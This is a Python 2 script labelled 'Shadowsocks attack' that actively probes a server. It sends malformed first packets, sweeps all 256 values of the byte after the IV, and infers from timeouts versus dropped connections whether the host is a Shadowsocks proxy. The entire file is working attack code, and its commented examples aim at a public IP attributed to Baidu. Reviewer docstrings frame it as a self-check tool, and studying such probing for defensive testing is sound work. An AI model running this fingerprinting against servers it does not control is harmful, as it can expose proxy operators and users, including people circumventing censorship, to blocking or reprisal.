Shadowsocks attack
#!/usr/bin/env python
#-*- coding: utf-8 -*-
'''
Copyleft (c) 2015 breakwa11
https://github.com/breakwa11/shadowsocks-rss
'''
import logging
import socket
import time
import traceback
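def test_single(iv_len, ip, port, addrtype, attack_data, timeout = 10):
    """Send one crafted first packet and report whether the peer stays silent.

    The payload is ``iv_len`` bytes of 0x01 (occupying the IV position), one
    byte with the value ``addrtype``, then ``attack_data``. The probe counts
    as a "success" only when ``recv`` runs into the timeout, i.e. the peer
    neither sent data nor closed the connection within ``timeout`` seconds.

    NOTE(review): presumably the peer stays silent when the byte after the IV
    decrypts to an address type it accepts and drops the connection
    otherwise -- this is inferred from the parameter names, confirm against
    the server build being checked.

    Args:
        iv_len: number of filler bytes sent in place of the cipher IV.
        ip: address of the server to check.
        port: TCP port of the server to check.
        addrtype: value (0-255) of the single byte sent right after the IV.
        attack_data: string appended after the ``addrtype`` byte.
        timeout: seconds to wait for a reply before counting a success.

    Returns:
        True if ``recv`` timed out, False if the peer answered, closed the
        connection, or ``recv`` failed with another socket error.

    Raises:
        socket.error: if connecting or sending fails (not caught here).
    """
    # Resolving "0.0.0.0" always yields the IPv4 family, so the probe is IPv4 only.
    af = socket.getaddrinfo("0.0.0.0", 0, 0, socket.SOCK_STREAM, socket.SOL_TCP)[0][0]
    s = socket.socket(af, socket.SOCK_STREAM)
    ok = False
    try:
        s.connect((ip, port))
        s.settimeout(timeout)
        s.send("\x01"*iv_len + chr(addrtype) + attack_data)
        try:
            s.recv(1024)
        except socket.timeout:
            # Silence until the deadline is the only outcome treated as a hit.
            ok = True
        except socket.error:
            # Reset/refused etc. count as a miss; unlike a bare ``except``
            # this lets KeyboardInterrupt and programming errors surface.
            pass
    finally:
        # Release the descriptor deterministically instead of relying on GC.
        s.close()
    if ok:
        print("Attack success with %d" % addrtype)
    else:
        print("Attack failure with %d" % addrtype)
    return ok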
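def test_scan(iv_len, ip, port, attack_data, timeout = 10):
    """Probe every value 0-255 of the byte after the IV and collect the silent ones.

    For each value a new TCP connection is opened and the payload
    ``"\\x01"*iv_len + chr(value) + attack_data`` is sent. A value is recorded
    when ``recv`` times out (the peer neither answered nor closed the
    connection within ``timeout`` seconds). The loop stops early once more
    than four values have been recorded, because that many silent values is
    reported as a failure anyway.

    Args:
        iv_len: number of filler bytes sent in place of the cipher IV.
        ip: address of the server to check.
        port: TCP port of the server to check.
        attack_data: string appended after the probed byte.
        timeout: seconds to wait for a reply on each connection.

    Returns:
        The list of recorded byte values when there are between one and four
        of them; None (implicitly falsy) when there are none or more than four.

    Raises:
        socket.error: if connecting or sending fails on any probe.
    """
    attack_ok_list = []
    for i in xrange(256):
        if i > 0 and i % 25 == 0:
            # Coarse progress indicator: prints 10%, 20%, ... every 25 probes.
            print("%d%%" % (i // 25 * 10,))
        # Resolving "0.0.0.0" always yields the IPv4 family (IPv4-only probe).
        af = socket.getaddrinfo("0.0.0.0", 0, 0, socket.SOCK_STREAM, socket.SOL_TCP)[0][0]
        s = socket.socket(af, socket.SOCK_STREAM)
        try:
            s.connect((ip, port))
            s.settimeout(timeout)
            s.send("\x01"*iv_len + chr(i) + attack_data)
            try:
                s.recv(1024)
            except socket.timeout:
                attack_ok_list.append(i)
            except socket.error:
                # Reset/closed connections are misses; narrower than a bare
                # ``except`` so Ctrl-C can interrupt a long scan.
                pass
        finally:
            # Up to 256 connections are opened; close each one explicitly.
            s.close()
        if len(attack_ok_list) > 4:
            break
        #time.sleep(1)
    if not attack_ok_list:
        print("Attack failure")
        return None
    hits = len(attack_ok_list)
    if hits <= 2:
        print("Attack success %s" % attack_ok_list)
        return attack_ok_list
    if hits <= 4:
        print("Need double check %s" % attack_ok_list)
        return attack_ok_list
    # More than four silent values: the peer is not discriminating on the byte.
    print("Attack failure")
    return None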
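def scan(iv_len, addr, port, scan_att_data = "\x03"*6, single_att_data = "\x24"*6): #len(att_data) == 6
    """Run the two-stage check and print whether addr:port looks like Shadowsocks.

    Stage one (``test_scan``) sweeps the byte after the IV using
    ``scan_att_data`` and returns the values for which the server stayed
    silent. Stage two re-probes each of those values with
    ``single_att_data`` via ``test_single``. The server is reported as
    Shadowsocks only when exactly one or two values pass the second stage;
    every other outcome is reported as "unknown server".

    The result is a heuristic based on how the server reacts to a malformed
    first packet, so it is useful as a self-check of whether a deployment is
    distinguishable by active probing.
    NOTE(review): later Shadowsocks releases added authenticated (AEAD)
    ciphers; whether a given build still shows this behaviour has to be
    verified per build.

    Args:
        iv_len: number of filler bytes sent in place of the cipher IV.
        addr: address of the server to check.
        port: TCP port of the server to check.
        scan_att_data: 6-character string appended during the sweep stage.
        single_att_data: 6-character string appended during the
            confirmation stage.

    Returns:
        None; the verdict is printed.
    """
    attack_ok_list = test_scan(iv_len, addr, port, scan_att_data)
    if not attack_ok_list:
        print("%s:%d is an unknown server" % (addr, port))
        return
    ok_count = 0
    for addrtype in attack_ok_list:
        # Forward the caller's confirmation payload; it was previously
        # ignored in favour of a hard-coded "\x24"*6 (the default value).
        if test_single(iv_len, addr, port, addrtype, single_att_data):
            ok_count += 1
    if ok_count in (1, 2):
        print("%s:%d is a Shadowsocks server" % (addr, port))
    else:
        print("%s:%d is an unknown server" % (addr, port))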
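if __name__ == '__main__':
    # The check is NOT 100% reliable, but works in most cases.
    # Change the att_data arguments if necessary.
    # First argument is the IV length: 16 in the examples below, 8 for the
    # chacha20/salsa20 encryptors.
    #scan(16, "123.125.114.144", 80) # test baidu
    #scan(16, "123.125.114.144", 443) # test baidu
    scan(16, "192.168.0.100", 8898, "\x2a"*6, "\x05"*6) # test your target server
    #scan( 8, "192.168.0.100", 8898, "\xf7"*6, "\x95"*6) # test your target server (chacha20/salsa20 encryptor)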